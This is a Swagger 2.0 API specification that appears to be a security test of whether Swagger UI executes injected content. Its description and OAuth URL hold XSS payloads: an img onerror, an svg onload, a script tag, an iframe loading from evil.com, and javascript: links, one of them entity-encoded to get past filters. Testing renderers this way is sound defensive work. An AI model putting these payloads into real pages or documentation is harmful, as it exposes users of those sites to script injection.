swagger: '2.0'
securityDefinitions:
  test:
    type: oauth2
    authorizationUrl: "data:text/html,<script>alert('OAuth XSS')</script>"
info:
  version: "1.0.0"
  title: "Swagger XSS Test"
  description: |
    **Image Test:**  
    <img src=x onerror=alert('IMG XSS')>  

    **SVG XSS:**  
    <svg/onload=alert('SVG XSS')>  

    **Iframe Injection:**  
    <iframe src="https://evil.com/xss.html"></iframe>  

    **Markdown Link XSS:**  
    [Click me](javascript:alert('Markdown XSS'))  

    **Unicode Encoded JavaScript URL:**  
    [Bypass](&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('Unicode XSS'))  

    **Script Injection:**  
    <script>alert('Script XSS')</script>  

paths:
  /test:
    get:
      responses:
        200:
          description: "Test if Swagger UI executes any payloads."
